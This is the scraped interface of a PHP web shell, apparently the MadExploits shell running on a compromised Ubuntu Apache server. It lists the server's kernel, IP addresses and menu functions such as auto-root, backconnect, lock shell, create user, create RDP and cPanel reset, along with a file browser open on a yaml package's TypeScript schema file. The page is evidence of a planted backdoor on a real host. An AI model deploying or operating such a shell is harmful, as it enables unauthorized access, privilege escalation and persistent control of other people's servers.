Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
yaml /
dist /
schema /
[ HOME SHELL ]
Name
Size
Permission
Action
common
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
json
[ DIR ]
drwxr-xr-x
yaml-1.1
[ DIR ]
drwxr-xr-x
Schema.d.ts
799
B
-rw-r--r--
Schema.js
1.51
KB
-rw-r--r--
json-schema.d.ts
1.95
KB
-rw-r--r--
tags.d.ts
1.39
KB
-rw-r--r--
tags.js
3.16
KB
-rw-r--r--
types.d.ts
3.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Schema.d.ts
import { MAP, SCALAR, SEQ } from '../nodes/identity.js'; import type { Pair } from '../nodes/Pair.js'; import type { SchemaOptions, ToStringOptions } from '../options.js'; import type { CollectionTag, ScalarTag } from './types.js'; export declare class Schema { compat: Array<CollectionTag | ScalarTag> | null; knownTags: Record<string, CollectionTag | ScalarTag>; name: string; sortMapEntries: ((a: Pair, b: Pair) => number) | null; tags: Array<CollectionTag | ScalarTag>; toStringOptions: Readonly<ToStringOptions> | null; readonly [MAP]: CollectionTag; readonly [SCALAR]: ScalarTag; readonly [SEQ]: CollectionTag; constructor({ compat, customTags, merge, resolveKnownTags, schema, sortMapEntries, toStringDefaults }: SchemaOptions); clone(): Schema; }
Close